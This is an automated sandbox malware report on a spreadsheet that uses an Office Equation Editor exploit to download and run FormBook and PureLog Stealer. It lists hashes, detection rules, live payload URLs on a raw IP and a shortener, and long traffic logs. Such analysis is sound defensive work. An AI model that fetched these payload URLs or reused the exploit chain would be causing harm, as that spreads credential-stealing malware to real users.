Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ#51281AOLAI.xls

Overview

General Information

Sample name:RFQ#51281AOLAI.xls
Analysis ID:1482963
MD5:114f2dfd11f6d21eddaf6162cb818ac2
SHA1:48d1cd6e1945d794b8eea48094de07f3d77c169a
SHA256:fcfabaaf9a5b228727840c434c7192369cd82f115fbe29dade21dc6c722eddd0
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious Excel or Word document
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Microsoft Office drops suspicious files
Office drops RTF file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2092 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WINWORD.EXE (PID: 3136 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
      • EQNEDT32.EXE (PID: 3316 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • winiti.exe (PID: 3412 cmdline: "C:\Users\user\AppData\Roaming\winiti.exe" MD5: 1F5C95D40C06C01300F0A6592945A72D)
      • winiti.exe (PID: 3452 cmdline: "C:\Users\user\AppData\Roaming\winiti.exe" MD5: 1F5C95D40C06C01300F0A6592945A72D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B9D5C678.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0xf74:$obj2: \objdata
  • 0xf60:$obj3: \objupdate
  • 0xf3b:$obj6: \objlink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0xf74:$obj2: \objdata
  • 0xf60:$obj3: \objupdate
  • 0xf3b:$obj6: \objlink

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.522804194.0000000000240000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000009.00000002.522804194.0000000000240000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2b9d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1447f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000009.00000002.522828239.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000009.00000002.522828239.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2ec33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x176e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000008.00000002.450826441.00000000005C0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        Click to see the 1 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        8.2.winiti.exe.5c0000.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          9.2.winiti.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            9.2.winiti.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2de33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x168e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
            8.2.winiti.exe.5c0000.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              8.2.winiti.exe.22f505c.3.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 3 entries

                Sigma Signatures

                Exploits

                barindex
                Sigma detected: EQNEDT32.EXE connecting to internet
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 104.219.239.104, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3316, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49168
                Sigma detected: File Dropped By EQNEDT32EXE
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3316, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exe

                System Summary

                barindex
                Sigma detected: Equation Editor Network Connection
                Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49168, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3316, Protocol: tcp, SourceIp: 104.219.239.104, SourceIsIpv6: false, SourcePort: 80
                Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
                Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\winiti.exe" , CommandLine: "C:\Users\user\AppData\Roaming\winiti.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\winiti.exe, NewProcessName: C:\Users\user\AppData\Roaming\winiti.exe, OriginalFileName: C:\Users\user\AppData\Roaming\winiti.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2092, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\winiti.exe" , ProcessId: 3412, ProcessName: winiti.exe
                Sigma detected: Suspicious Microsoft Office Child Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\winiti.exe" , CommandLine: "C:\Users\user\AppData\Roaming\winiti.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\winiti.exe, NewProcessName: C:\Users\user\AppData\Roaming\winiti.exe, OriginalFileName: C:\Users\user\AppData\Roaming\winiti.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2092, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\winiti.exe" , ProcessId: 3412, ProcessName: winiti.exe
                Sigma detected: Excel Network Connections
                Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 188.114.96.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 2092, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                Sigma detected: Suspicious Office Outbound Connections
                Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 2092, Protocol: tcp, SourceIp: 188.114.96.3, SourceIsIpv6: false, SourcePort: 80
                Sigma detected: Modification of IE Registry Settings
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 2092, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Sigma detected: Office Macro File Creation
                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3136, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                Snort Signatures

                No Snort rule has matched

                Suricata Signatures

                Timestamp:2024-07-26T12:42:50.732149+0200
                SID:2022050
                Source Port:80
                Destination Port:49168
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T12:42:50.904584+0200
                SID:2022051
                Source Port:80
                Destination Port:49168
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened[1].docAvira: detection malicious, Label: HEUR/Rtf.Malformed
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B9D5C678.docAvira: detection malicious, Label: HEUR/Rtf.Malformed
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{B2025738-BC6B-4CB2-8D99-AAA2C3F993CF}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                Multi AV Scanner detection for domain / URL
                Source: tny.wtfVirustotal: Detection: 5%Perma Link
                Source: http://tny.wtf/Virustotal: Detection: 5%Perma Link
                Source: http://104.219.239.104/80/winiti.exeVirustotal: Detection: 11%Perma Link
                Source: http://104.219.239.104/xampp/bn/recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened.docVirustotal: Detection: 11%Perma Link
                Source: http://104.219.239.104/80/winiti.exejVirustotal: Detection: 11%Perma Link
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exeVirustotal: Detection: 48%Perma Link
                Multi AV Scanner detection for submitted file
                Source: RFQ#51281AOLAI.xlsReversingLabs: Detection: 18%
                Source: RFQ#51281AOLAI.xlsVirustotal: Detection: 19%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 9.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.522804194.0000000000240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.522828239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\winiti.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: RFQ#51281AOLAI.xlsJoe Sandbox ML: detected

                Exploits

                barindex
                Office equation editor establishes network connection
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 104.219.239.104 Port: 80Jump to behavior
                Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\winiti.exeJump to behavior
                Source: ~WRF{B2025738-BC6B-4CB2-8D99-AAA2C3F993CF}.tmp.3.drStream path '_1783481320/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: ~WRF{B2025738-BC6B-4CB2-8D99-AAA2C3F993CF}.tmp.3.drStream path '_1783481329/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: ~WRF{B2025738-BC6B-4CB2-8D99-AAA2C3F993CF}.tmp.3.drStream path '_1783481355/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: ~WRF{B2025738-BC6B-4CB2-8D99-AAA2C3F993CF}.tmp.3.drStream path '_1783481357/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: ~WRF{B2025738-BC6B-4CB2-8D99-AAA2C3F993CF}.tmp.3.drStream path '_1783481359/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: amWV.pdb source: winiti.exe, 00000008.00000000.439146431.0000000000302000.00000020.00000001.01000000.00000005.sdmp, winiti[1].exe.6.dr, winiti.exe.6.dr
                Source: Binary string: amWV.pdbSHA256 source: winiti.exe, 00000008.00000000.439146431.0000000000302000.00000020.00000001.01000000.00000005.sdmp, winiti[1].exe.6.dr, winiti.exe.6.dr
                Source: Binary string: wntdll.pdb source: winiti.exe, winiti.exe, 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp

                Software Vulnerabilities

                barindex
                Document exploit detected (process start blacklist hit)
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                Source: global trafficDNS query: name: tny.wtf
                Source: global trafficDNS query: name: tny.wtf
                Source: global trafficDNS query: name: tny.wtf
                Source: global trafficDNS query: name: tny.wtf
                Source: global trafficDNS query: name: tny.wtf
                Source: global trafficDNS query: name: tny.wtf
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:80
                Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:80
                Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
                Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
                Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
